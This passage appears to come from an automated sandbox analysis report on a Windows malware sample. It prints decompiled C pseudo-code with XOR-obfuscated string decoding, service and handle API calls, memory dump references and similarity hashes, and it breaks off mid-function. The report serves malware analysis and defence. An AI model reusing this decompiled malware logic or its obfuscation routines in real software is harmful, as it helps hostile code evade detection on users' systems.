                                                                    					_v12 = 0x88;
                                                                    					_v10 = 0xa9;
                                                                    					_v9 = 0xad;
                                                                    					_v8 = 0xb2;
                                                                    					_v7 = 0xb8;
                                                                    					_v5 = 0x9a;
                                                                    					_v4 = 0xdb;
                                                                    					_t21 = 0;
                                                                    					do {
                                                                    						 *(_t27 + _t21) =  *(_t27 + _t21) ^ 0x000000db;
                                                                    						_t21 = _t21 + 1;
                                                                    					} while (_t21 < 0xd);
                                                                    					 *0x447f54 = E0041C580(_t27);
                                                                    				}
                                                                    				_t19 = OpenServiceA(_a4, _a8, _a12); // executed
                                                                    				return _t19;
                                                                    			}


















                                                                    0x0041d13a
                                                                    0x0041d13e
                                                                    0x0041d142
                                                                    0x0041d146
                                                                    0x0041d14a
                                                                    0x0041d14e
                                                                    0x0041d153
                                                                    0x0041d158
                                                                    0x0041d15d
                                                                    0x0041d162
                                                                    0x0041d167
                                                                    0x0041d16c
                                                                    0x0041d171
                                                                    0x0041d176
                                                                    0x0041d17b
                                                                    0x0041d180
                                                                    0x0041d180
                                                                    0x0041d184
                                                                    0x0041d185
                                                                    0x0041d196
                                                                    0x0041d196
                                                                    0x0041d1aa
                                                                    0x0041d1af

                                                                    APIs
                                                                    • OpenServiceA.ADVAPI32(?,?,?,80000000,0000FFB9,?,00447B7C,?,?,?,?,?,?,?,0041F71F,?), ref: 0041D1AA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: OpenService
                                                                    • String ID:
                                                                    • API String ID: 3098006287-0
                                                                    • Opcode ID: 8ad8555aae2914c87ab83e1b127080138661eb196913903355f7bb7feac84cdd
                                                                    • Instruction ID: 8caca4a4ce0d112ee089aba942ab0f3bae238fe4d1f2d8d686c823bb8b6763ac
                                                                    • Opcode Fuzzy Hash: 8ad8555aae2914c87ab83e1b127080138661eb196913903355f7bb7feac84cdd
                                                                    • Instruction Fuzzy Hash: FF01F76101C7C2ADC322DB7C884445FBFA05AA7120F48CF9DF1F88A2E6E224844AC767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041A8E0(void* _a4) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				int _t16;
                                                                    				void* _t18;
                                                                    				CHAR* _t23;
                                                                    
                                                                    				if( *0x447dd4 == 0) {
                                                                    					_v8 = 0xd7;
                                                                    					_v2 = 0xd7;
                                                                    					 *_t23 = 0xf1;
                                                                    					_v11 = 0xde;
                                                                    					_v10 = 0xdd;
                                                                    					_v9 = 0xc1;
                                                                    					_v7 = 0xfa;
                                                                    					_v6 = 0xd3;
                                                                    					_v5 = 0xdc;
                                                                    					_v4 = 0xd6;
                                                                    					_v3 = 0xde;
                                                                    					_v1 = 0xb2;
                                                                    					_t18 = 0;
                                                                    					do {
                                                                    						 *(_t23 + _t18) =  *(_t23 + _t18) ^ 0x000000b2;
                                                                    						_t18 = _t18 + 1;
                                                                    					} while (_t18 < 0xc);
                                                                    					 *0x447dd4 = E0041A600(_t23);
                                                                    				}
                                                                    				_t16 = FindCloseChangeNotification(_a4); // executed
                                                                    				return _t16;
                                                                    			}

















                                                                    0x0041a8ea
                                                                    0x0041a8f0
                                                                    0x0041a8f4
                                                                    0x0041a8f8
                                                                    0x0041a8fc
                                                                    0x0041a900
                                                                    0x0041a905
                                                                    0x0041a90a
                                                                    0x0041a90f
                                                                    0x0041a914
                                                                    0x0041a919
                                                                    0x0041a91e
                                                                    0x0041a922
                                                                    0x0041a927
                                                                    0x0041a930
                                                                    0x0041a930
                                                                    0x0041a934
                                                                    0x0041a935
                                                                    0x0041a946
                                                                    0x0041a946
                                                                    0x0041a950
                                                                    0x0041a955

                                                                    APIs
                                                                    • FindCloseChangeNotification.KERNELBASE(?,00447B7C,?,00447B7C,?,?,?,?,?,00000001), ref: 0041A950
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    • Opcode ID: 6a1dc7c0719da4f0201af0f491763625800c054aea6abd20a382dbba3a02c501
                                                                    • Instruction ID: 12183129b2568a6ea25f0618c91f0b99db0db3bce0941212f6c819734e555830
                                                                    • Opcode Fuzzy Hash: 6a1dc7c0719da4f0201af0f491763625800c054aea6abd20a382dbba3a02c501
                                                                    • Instruction Fuzzy Hash: 7101E56141D7C29AC322D77C590458FBFE45AA3124F08CF9DE4F8862E2E220815AC367
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 99%
                                                                    			E00408980(char __ecx, intOrPtr* _a4) {
                                                                    				signed int _v4;
                                                                    				intOrPtr _v12;
                                                                    				char* _v16;
                                                                    				char* _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				char* _v32;
                                                                    				char* _v36;
                                                                    				char* _v40;
                                                                    				char* _v44;
                                                                    				char* _v48;
                                                                    				char* _v52;
                                                                    				char* _v56;
                                                                    				char* _v60;
                                                                    				char* _v64;
                                                                    				char* _v68;
                                                                    				char* _v72;
                                                                    				char* _v76;
                                                                    				char* _v80;
                                                                    				char* _v84;
                                                                    				char* _v88;
                                                                    				char* _v92;
                                                                    				char* _v96;
                                                                    				char* _v100;
                                                                    				char* _v104;
                                                                    				char* _v108;
                                                                    				char* _v112;
                                                                    				char* _v116;
                                                                    				char* _v120;
                                                                    				char* _v124;
                                                                    				char* _v128;
                                                                    				char* _v132;
                                                                    				char* _v136;
                                                                    				char* _v140;
                                                                    				char* _v144;
                                                                    				char* _v148;
                                                                    				char* _v152;
                                                                    				char* _v156;
                                                                    				char* _v160;
                                                                    				char* _v164;
                                                                    				char* _v168;
                                                                    				char* _v172;
                                                                    				char* _v176;
                                                                    				char* _v180;
                                                                    				char* _v184;
                                                                    				char* _v188;
                                                                    				char* _v192;
                                                                    				char* _v196;
                                                                    				char* _v200;
                                                                    				char* _v204;
                                                                    				char* _v208;
                                                                    				char* _v212;
                                                                    				char* _v216;
                                                                    				char* _v220;
                                                                    				char* _v224;
                                                                    				char* _v228;
                                                                    				char* _v232;
                                                                    				char* _v236;
                                                                    				char* _v240;
                                                                    				char* _v244;
                                                                    				char* _v248;
                                                                    				char* _v252;
                                                                    				char* _v256;
                                                                    				char* _v260;
                                                                    				intOrPtr _v264;
                                                                    				signed int _v268;
                                                                    				char _v284;
                                                                    				char _v288;
                                                                    				char _v292;
                                                                    				signed char _v293;
                                                                    				char _v296;
                                                                    				char _v298;
                                                                    				char _v299;
                                                                    				char _v300;
                                                                    				char _v301;
                                                                    				char _v302;
                                                                    				char _v303;
                                                                    				char _v304;
                                                                    				char _v305;
                                                                    				char _v306;
                                                                    				char _v307;
                                                                    				char _v308;
                                                                    				char _v311;
                                                                    				char _v312;
                                                                    				char _v313;
                                                                    				char _v314;
                                                                    				char _v315;
                                                                    				char _v316;
                                                                    				char _v317;
                                                                    				char _v318;
                                                                    				char _v319;
                                                                    				char _v320;
                                                                    				char _v324;
                                                                    				char _v325;
                                                                    				char _v326;
                                                                    				char _v327;
                                                                    				char _v328;
                                                                    				char _v329;
                                                                    				char _v330;
                                                                    				char _v331;
                                                                    				char _v332;
                                                                    				char _v336;
                                                                    				char _v337;
                                                                    				char _v338;
                                                                    				char _v339;
                                                                    				char _v340;
                                                                    				char _v341;
                                                                    				char _v342;
                                                                    				char _v343;
                                                                    				char _v344;
                                                                    				char _v348;
                                                                    				char _v349;
                                                                    				char _v350;
                                                                    				char _v351;
                                                                    				char _v352;
                                                                    				char _v353;
                                                                    				char _v354;
                                                                    				char _v355;
                                                                    				char _v356;
                                                                    				char _v360;
                                                                    				char _v361;
                                                                    				char _v362;
                                                                    				char _v363;
                                                                    				char _v364;
                                                                    				char _v365;
                                                                    				char _v366;
                                                                    				char _v367;
                                                                    				char _v368;
                                                                    				char _v372;
                                                                    				char _v373;
                                                                    				char _v374;
                                                                    				char _v375;
                                                                    				char _v376;
                                                                    				char _v377;
                                                                    				char _v378;
                                                                    				char _v379;
                                                                    				char _v380;
                                                                    				char _v381;
                                                                    				char _v382;
                                                                    				char _v383;
                                                                    				char _v384;
                                                                    				char _v385;
                                                                    				char _v386;
                                                                    				char _v387;
                                                                    				char _v388;
                                                                    				char _v389;
                                                                    				char _v390;
                                                                    				char _v391;
                                                                    				char _v392;
                                                                    				char _v393;
                                                                    				char _v394;
                                                                    				char _v395;
                                                                    				char _v396;
                                                                    				char _v397;
                                                                    				char _v398;
                                                                    				char _v399;
                                                                    				char _v400;
                                                                    				char _v401;
                                                                    				char _v402;
                                                                    				char _v403;
                                                                    				char _v404;
                                                                    				char _v405;
                                                                    				char _v406;
                                                                    				char _v407;
                                                                    				char _v408;
                                                                    				char _v409;
                                                                    				char _v410;
                                                                    				char _v411;
                                                                    				char _v412;
                                                                    				char _v413;
                                                                    				char _v414;
                                                                    				char _v415;
                                                                    				char _v416;
                                                                    				char _v417;
                                                                    				char _v418;
                                                                    				char _v419;
                                                                    				char _v420;
                                                                    				char _v421;
                                                                    				char _v422;
                                                                    				char _v423;
                                                                    				char _v424;
                                                                    				char _v425;
                                                                    				char _v426;
                                                                    				char _v427;
                                                                    				char _v428;
                                                                    				char _v429;
                                                                    				char _v430;
                                                                    				char _v431;
                                                                    				char _v432;
                                                                    				char _v433;
                                                                    				char _v434;
                                                                    				char _v435;
                                                                    				char _v436;
                                                                    				char _v437;
                                                                    				char _v438;
                                                                    				char _v439;
                                                                    				char _v440;
                                                                    				char _v441;
                                                                    				char _v442;
                                                                    				char _v443;
                                                                    				char _v444;
                                                                    				char _v445;
                                                                    				char _v446;
                                                                    				char _v447;
                                                                    				char _v448;
                                                                    				char _v449;
                                                                    				char _v450;
                                                                    				char _v451;
                                                                    				char _v452;
                                                                    				char _v453;
                                                                    				char _v454;
                                                                    				char _v455;
                                                                    				char _v456;
                                                                    				char _v457;
                                                                    				char _v458;
                                                                    				char _v459;
                                                                    				char _v460;
                                                                    				char _v461;
                                                                    				char _v462;
                                                                    				char _v463;
                                                                    				char _v464;
                                                                    				char _v465;
                                                                    				char _v466;
                                                                    				char _v467;
                                                                    				char _v468;
                                                                    				char _v469;
                                                                    				char _v470;
                                                                    				char _v471;
                                                                    				char _v472;
                                                                    				char _v473;
                                                                    				char _v474;
                                                                    				char _v475;
                                                                    				char _v476;
                                                                    				char _v478;
                                                                    				char _v479;
                                                                    				char _v480;
                                                                    				char _v481;
                                                                    				char _v482;
                                                                    				char _v483;
                                                                    				char _v484;
                                                                    				char _v486;
                                                                    				char _v487;
                                                                    				char _v488;
                                                                    				char _v489;
                                                                    				char _v490;
                                                                    				char _v491;
                                                                    				char _v492;
                                                                    				char _v494;
                                                                    				char _v495;
                                                                    				char _v496;
                                                                    				char _v497;
                                                                    				char _v498;
                                                                    				char _v499;
                                                                    				char _v500;
                                                                    				char _v502;
                                                                    				char _v503;
                                                                    				char _v504;
                                                                    				char _v505;
                                                                    				char _v506;
                                                                    				char _v507;
                                                                    				char _v508;
                                                                    				char _v510;
                                                                    				char _v511;
                                                                    				char _v512;
                                                                    				char _v513;
                                                                    				char _v514;
                                                                    				char _v515;
                                                                    				char _v516;
                                                                    				char _v518;
                                                                    				char _v519;
                                                                    				char _v520;
                                                                    				char _v521;
                                                                    				char _v522;
                                                                    				char _v523;
                                                                    				char _v524;
                                                                    				char _v526;
                                                                    				char _v527;
                                                                    				char _v528;
                                                                    				char _v529;
                                                                    				char _v530;
                                                                    				char _v531;
                                                                    				char _v532;
                                                                    				char _v534;
                                                                    				char _v535;
                                                                    				char _v536;
                                                                    				char _v537;
                                                                    				char _v538;
                                                                    				char _v539;
                                                                    				char _v540;
                                                                    				char _v542;
                                                                    				char _v543;
                                                                    				char _v544;
                                                                    				char _v545;
                                                                    				char _v546;
                                                                    				char _v547;
                                                                    				char _v548;
                                                                    				char _v550;
                                                                    				char _v551;
                                                                    				char _v552;
                                                                    				char _v553;
                                                                    				char _v554;
                                                                    				char _v555;
                                                                    				char _v556;
                                                                    				char _v558;
                                                                    				char _v559;
                                                                    				char _v560;
                                                                    				char _v561;
                                                                    				char _v562;
                                                                    				char _v563;
                                                                    				char _v564;
                                                                    				char _v566;
                                                                    				char _v567;
                                                                    				char _v568;
                                                                    				char _v569;
                                                                    				char _v570;
                                                                    				char _v571;
                                                                    				char _v572;
                                                                    				char _v574;
                                                                    				char _v575;
                                                                    				char _v576;
                                                                    				char _v577;
                                                                    				char _v578;
                                                                    				char _v579;
                                                                    				char _v580;
                                                                    				char _v583;
                                                                    				char _v584;
                                                                    				char _v585;
                                                                    				char _v586;
                                                                    				char _v587;
                                                                    				char _v588;
                                                                    				char _v591;
                                                                    				char _v592;
                                                                    				char _v593;
                                                                    				char _v594;
                                                                    				char _v595;
                                                                    				char _v596;
                                                                    				char _v599;
                                                                    				char _v600;
                                                                    				char _v601;
                                                                    				char _v602;
                                                                    				char _v603;
                                                                    				char _v604;
                                                                    				char _v607;
                                                                    				char _v608;
                                                                    				char _v609;
                                                                    				char _v610;
                                                                    				char _v611;
                                                                    				char _v612;
                                                                    				char _v615;
                                                                    				char _v616;
                                                                    				char _v617;
                                                                    				char _v618;
                                                                    				char _v619;
                                                                    				char _v620;
                                                                    				char _v623;
                                                                    				char _v624;
                                                                    				char _v625;
                                                                    				char _v626;
                                                                    				char _v627;
                                                                    				char _v628;
                                                                    				char _v631;
                                                                    				char _v632;
                                                                    				char _v633;
                                                                    				char _v634;
                                                                    				char _v635;
                                                                    				char _v636;
                                                                    				char _v639;
                                                                    				char _v640;
                                                                    				char _v641;
                                                                    				char _v642;
                                                                    				char _v643;
                                                                    				char _v644;
                                                                    				char _v647;
                                                                    				char _v648;
                                                                    				char _v649;
                                                                    				char _v650;
                                                                    				char _v651;
                                                                    				char _v652;
                                                                    				char _v655;
                                                                    				char _v656;
                                                                    				char _v657;
                                                                    				char _v658;
                                                                    				char _v659;
                                                                    				char _v660;
                                                                    				char _v663;
                                                                    				char _v664;
                                                                    				char _v665;
                                                                    				char _v666;
                                                                    				char _v667;
                                                                    				char _v668;
                                                                    				char _v672;
                                                                    				char _v673;
                                                                    				char _v674;
                                                                    				char _v675;
                                                                    				char _v676;
                                                                    				char _v680;
                                                                    				char _v681;
                                                                    				char _v682;
                                                                    				char _v683;
                                                                    				char _v684;
                                                                    				char _v688;
                                                                    				char _v689;
                                                                    				char _v690;
                                                                    				char _v691;
                                                                    				char _v692;
                                                                    				char _v696;
                                                                    				char _v697;
                                                                    				char _v698;
                                                                    				char _v699;
                                                                    				char _v700;
                                                                    				char _v704;
                                                                    				char _v705;
                                                                    				char _v706;
                                                                    				char _v707;
                                                                    				char _v708;
                                                                    				char _v712;
                                                                    				char _v713;
                                                                    				char _v714;
                                                                    				char _v715;
                                                                    				char _v716;
                                                                    				char _v720;
                                                                    				char _v721;
                                                                    				char _v722;
                                                                    				char _v723;
                                                                    				char _v724;
                                                                    				char _v728;
                                                                    				char _v729;
                                                                    				char _v730;
                                                                    				char _v731;
                                                                    				char _v732;
                                                                    				char _v736;
                                                                    				char _v737;
                                                                    				char _v738;
                                                                    				char _v739;
                                                                    				char _v740;
                                                                    				char _v744;
                                                                    				char _v745;
                                                                    				char _v746;
                                                                    				char _v747;
                                                                    				char _v748;
                                                                    				char _v752;
                                                                    				char _v753;
                                                                    				char _v754;
                                                                    				char _v755;
                                                                    				char _v756;
                                                                    				char _v760;
                                                                    				char _v761;
                                                                    				char _v762;
                                                                    				char _v763;
                                                                    				char _v764;
                                                                    				char _v765;
                                                                    				char _v766;
                                                                    				char _v767;
                                                                    				char _v768;
                                                                    				char _v769;
                                                                    				char _v770;
                                                                    				char _v771;
                                                                    				char _v772;
                                                                    				char _v773;
                                                                    				char _v774;
                                                                    				char _v775;
                                                                    				char _v776;
                                                                    				char _v777;
                                                                    				char _v778;
                                                                    				char _v779;
                                                                    				char _v780;
                                                                    				char _v781;
                                                                    				char _v782;
                                                                    				char _v783;
                                                                    				char _v784;
                                                                    				char _v785;
                                                                    				char _v786;
                                                                    				char _v787;
                                                                    				char _v788;
                                                                    				char _v790;
                                                                    				char _v791;
                                                                    				char _v792;
                                                                    				signed int _v796;
                                                                    				void* __ebp;
                                                                    				signed char _t944;
                                                                    				char _t946;
                                                                    				signed int _t947;
                                                                    				signed int _t953;
                                                                    				signed char _t956;
                                                                    				signed int _t957;
                                                                    				signed int _t958;
                                                                    				signed int _t962;
                                                                    				signed int _t984;
                                                                    				signed int _t987;
                                                                    				signed int _t989;
                                                                    				intOrPtr _t990;
                                                                    				void* _t991;
                                                                    				signed int _t994;
                                                                    				signed char _t997;
                                                                    				signed char _t998;
                                                                    				signed char _t1000;
                                                                    				signed short _t1010;
                                                                    				signed int _t1015;
                                                                    				signed int _t1024;
                                                                    				signed int _t1028;
                                                                    				signed int _t1032;
                                                                    				signed int _t1036;
                                                                    				signed int _t1041;
                                                                    				signed int _t1045;
                                                                    				signed int _t1049;
                                                                    				signed int _t1053;
                                                                    				signed int _t1057;
                                                                    				signed int _t1061;
                                                                    				signed int _t1065;
                                                                    				signed int _t1069;
                                                                    				signed int _t1073;
                                                                    				signed int _t1077;
                                                                    				signed int _t1081;
                                                                    				signed int _t1086;
                                                                    				signed int _t1090;
                                                                    				signed int _t1094;
                                                                    				signed int _t1098;
                                                                    				signed int _t1102;
                                                                    				signed int _t1106;
                                                                    				signed int _t1110;
                                                                    				signed int _t1115;
                                                                    				signed int _t1119;
                                                                    				void* _t1123;
                                                                    				signed int _t1127;
                                                                    				signed int _t1131;
                                                                    				signed int _t1136;
                                                                    				signed int _t1140;
                                                                    				signed int _t1144;
                                                                    				signed int _t1148;
                                                                    				signed int _t1152;
                                                                    				signed int _t1156;
                                                                    				signed int _t1160;
                                                                    				signed int _t1164;
                                                                    				signed int _t1168;
                                                                    				signed int _t1172;
                                                                    				signed int _t1176;
                                                                    				signed int _t1181;
                                                                    				signed int _t1185;
                                                                    				signed int _t1189;
                                                                    				signed int _t1193;
                                                                    				signed int _t1197;
                                                                    				void* _t1201;
                                                                    				signed int _t1205;
                                                                    				signed int _t1209;
                                                                    				signed int _t1213;
                                                                    				signed int _t1217;
                                                                    				signed int _t1221;
                                                                    				signed int _t1225;
                                                                    				signed int _t1229;
                                                                    				signed int _t1233;
                                                                    				signed int _t1237;
                                                                    				signed int _t1241;
                                                                    				signed int _t1245;
                                                                    				signed int _t1249;
                                                                    				signed int _t1253;
                                                                    				signed int _t1257;
                                                                    				signed int _t1261;
                                                                    				signed int _t1265;
                                                                    				signed int _t1269;
                                                                    				signed int _t1273;
                                                                    				signed int _t1302;
                                                                    				signed int _t1305;
                                                                    				signed int _t1307;
                                                                    				signed int _t1309;
                                                                    				signed int _t1311;
                                                                    				signed int _t1313;
                                                                    				signed int _t1315;
                                                                    				signed int _t1317;
                                                                    				signed int _t1319;
                                                                    				signed int _t1321;
                                                                    				signed int _t1323;
                                                                    				signed int _t1325;
                                                                    				signed int _t1327;
                                                                    				signed int _t1329;
                                                                    				signed int _t1331;
                                                                    				signed int _t1333;
                                                                    				signed int _t1335;
                                                                    				signed int _t1337;
                                                                    				signed int _t1339;
                                                                    				signed int _t1341;
                                                                    				signed int _t1343;
                                                                    				signed int _t1345;
                                                                    				signed int _t1347;
                                                                    				signed int _t1349;
                                                                    				signed int _t1351;
                                                                    				signed int _t1353;
                                                                    				signed int _t1355;
                                                                    				signed int _t1357;
                                                                    				signed int _t1359;
                                                                    				signed int _t1361;
                                                                    				signed int _t1363;
                                                                    				signed int _t1365;
                                                                    				signed int _t1367;
                                                                    				signed int _t1369;
                                                                    				signed int _t1371;
                                                                    				signed int _t1373;
                                                                    				signed int _t1375;
                                                                    				signed int _t1377;
                                                                    				signed int _t1379;
                                                                    				signed int _t1381;
                                                                    				signed int _t1383;
                                                                    				signed int _t1385;
                                                                    				signed int _t1387;
                                                                    				signed int _t1389;
                                                                    				signed int _t1391;
                                                                    				signed int _t1393;
                                                                    				signed int _t1395;
                                                                    				signed int _t1397;
                                                                    				signed int _t1399;
                                                                    				signed int _t1401;
                                                                    				signed int _t1403;
                                                                    				signed int _t1405;
                                                                    				signed int _t1407;
                                                                    				signed int _t1409;
                                                                    				signed int _t1411;
                                                                    				signed int _t1413;
                                                                    				signed int _t1415;
                                                                    				signed int _t1417;
                                                                    				signed int _t1419;
                                                                    				signed int _t1421;
                                                                    				signed int _t1423;
                                                                    				signed int _t1425;
                                                                    				signed int _t1454;
                                                                    				intOrPtr _t1455;
                                                                    				signed int _t1456;
                                                                    				signed int _t1457;
                                                                    				intOrPtr* _t1460;
                                                                    				signed int _t1462;
                                                                    				signed int _t1463;
                                                                    				signed int _t1464;
                                                                    				intOrPtr* _t1465;
                                                                    				signed int _t1649;
                                                                    				signed int _t1651;
                                                                    				intOrPtr _t1654;
                                                                    				void* _t1655;
                                                                    
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FBAB);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t1654;
                                                                    				_t1655 = _t1654 - 0x310;
                                                                    				_t1460 = _a4;
                                                                    				_v292 = __ecx;
                                                                    				if(_t1460 != 0) {
                                                                    					_t997 = _v293;
                                                                    					__eflags = _t997 - 0x1d;
                                                                    					if(_t997 >= 0x1d) {
                                                                    						_t944 = _t997 * 0x69;
                                                                    						__eflags = _t944;
                                                                    						_t998 = _t944;
                                                                    					} else {
                                                                    						_t998 = _t997 | 0x00000023;
                                                                    					}
                                                                    					_t1651 = E004226A0(_t1460, 0x40);
                                                                    					_t1655 = _t1655 + 8;
                                                                    					__eflags = _t1651;
                                                                    					if(_t1651 == 0) {
                                                                    						L12:
                                                                    						_t946 = 0;
                                                                    						goto L287;
                                                                    					} else {
                                                                    						__eflags = _t1651 - _t1460 - 0x20;
                                                                    						if(_t1651 - _t1460 > 0x20) {
                                                                    							goto L12;
                                                                    						}
                                                                    						_t947 = _t998 & 0x000000ff;
                                                                    						_t1302 = 0x6e;
                                                                    						_t1015 = _t947 & 0x21;
                                                                    						__eflags = _t1015;
                                                                    						_t1462 = 0x52;
                                                                    						do {
                                                                    							_t947 = _t947 + 0x37;
                                                                    							_t1302 = _t1302 - _t1015;
                                                                    							_t1462 = _t1462 - 1;
                                                                    							__eflags = _t1462;
                                                                    						} while (_t1462 != 0);
                                                                    						_v796 = _t947 * _t1302 - 0x64;
                                                                    						_t1463 = E00422660(_t1015, _t1651, 0x2e);
                                                                    						_t1655 = _t1655 + 8;
                                                                    						__eflags = _t1463;
                                                                    						if(_t1463 == 0) {
                                                                    							goto L12;
                                                                    						}
                                                                    						_v264 = 0xf;
                                                                    						_v268 = 0;
                                                                    						_v284 = 0;
                                                                    						_t12 = _t1463 + 1; // 0x1
                                                                    						_v4 = 0;
                                                                    						E00407B70(_t12);
                                                                    						_t953 = E00407410( &_v292);
                                                                    						__eflags = _t953;
                                                                    						if(_t953 != 0) {
                                                                    							E00407330( &_v796);
                                                                    							_t1454 = _t1463;
                                                                    							_t1464 = _t1463 - 1;
                                                                    							__eflags = _t1464 - _t1651;
                                                                    							if(_t1464 < _t1651) {
                                                                    								L19:
                                                                    								__eflags = _t998 - 0x1d;
                                                                    								if(_t998 >= 0x1d) {
                                                                    									_t956 = _t998 * 0x69;
                                                                    									__eflags = _t956;
                                                                    									_t1000 = _t956;
                                                                    								} else {
                                                                    									_t1000 = _t998 | 0x00000023;
                                                                    								}
                                                                    								_t1465 = _a4;
                                                                    								__eflags = _t1465 - _t1651;
                                                                    								if(_t1465 == _t1651) {
                                                                    									L33:
                                                                    									_t957 =  *0x447afc; // 0x0
                                                                    									_t958 = _t957 * 0x76;
                                                                    									_t1305 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v668 = 0xa8;
                                                                    									_v667 = 0xb5;
                                                                    									_v666 = 0xb5;
                                                                    									_v665 = 0xae;
                                                                    									_v664 = 0x9a;
                                                                    									_v663 = 0xda;
                                                                    									_t1024 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1305 - 0x54;
                                                                    										if(_t1305 >= 0x54) {
                                                                    											_t1305 = _t1305 ^ 0x00000018;
                                                                    											__eflags = _t1305;
                                                                    										}
                                                                    										 *(_t1655 + _t1024 + 0x90) =  *(_t1655 + _t1024 + 0x90) ^ 0x000000da;
                                                                    										_t1024 = _t1024 + 1;
                                                                    										__eflags = _t1024 - 6;
                                                                    									} while (_t1024 < 6);
                                                                    									_v580 = 0xa8;
                                                                    									_t1307 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v579 = 0xa4;
                                                                    									_v578 = 0xb6;
                                                                    									_v577 = 0xb1;
                                                                    									_v576 = 0xa0;
                                                                    									_v575 = 0xb7;
                                                                    									_v574 = 0xc5;
                                                                    									_t1028 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1307 - 0x54;
                                                                    										if(_t1307 >= 0x54) {
                                                                    											_t1307 = _t1307 ^ 0x00000018;
                                                                    											__eflags = _t1307;
                                                                    										}
                                                                    										 *(_t1655 + _t1028 + 0xe8) =  *(_t1655 + _t1028 + 0xe8) ^ 0x000000c5;
                                                                    										_t1028 = _t1028 + 1;
                                                                    										__eflags = _t1028 - 7;
                                                                    									} while (_t1028 < 7);
                                                                    									_t1309 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v644 = 0x79;
                                                                    									_v643 = 0x7c;
                                                                    									_v642 = 0x75;
                                                                    									_v641 = 0x71;
                                                                    									_v640 = 0x76;
                                                                    									_v639 = 0x18;
                                                                    									_t1032 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1309 - 0x54;
                                                                    										if(_t1309 >= 0x54) {
                                                                    											_t1309 = _t1309 ^ 0x00000018;
                                                                    											__eflags = _t1309;
                                                                    										}
                                                                    										 *(_t1655 + _t1032 + 0xa8) =  *(_t1655 + _t1032 + 0xa8) ^ 0x00000018;
                                                                    										_t1032 = _t1032 + 1;
                                                                    										__eflags = _t1032 - 6;
                                                                    									} while (_t1032 < 6);
                                                                    									_v450 = 0xb6;
                                                                    									_v449 = 0xb6;
                                                                    									_t1311 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
                                                                    									_v452 = 0xb5;
                                                                    									_v451 = 0xb3;
                                                                    									_v448 = 0xa9;
                                                                    									_v447 = 0xb4;
                                                                    									_v446 = 0xb2;
                                                                    									_v445 = 0xc6;
                                                                    									_t1036 = 0;
                                                                    									__eflags = 0;
                                                                    									do {
                                                                    										__eflags = _t1311 - 0x54;
                                                                    										if(_t1311 >= 0x54) {
                                                                    											_t1311 = _t1311 ^ 0x00000018;
                                                                    											__eflags = _t1311;
                                                                    										}
                                                                    										 *(_t1655 + _t1036 + 0x168) =  *(_t1655 + _t1036 + 0x168) ^ 0x000000c6;
                                                                    										_t1036 = _t1036 + 1;
                                                                    										__eflags = _t1036 - 8;
                                                                    									} while (_t1036 < 8);
                                                                    									_v553 = 0x56;
                                                                    									_v551 = 0x56;
                                                                    									_t1313 = ((_v796 * 0x00000042 | _t958) << 4) + _v796 + (_v796 * 0x00000042 | _t958);
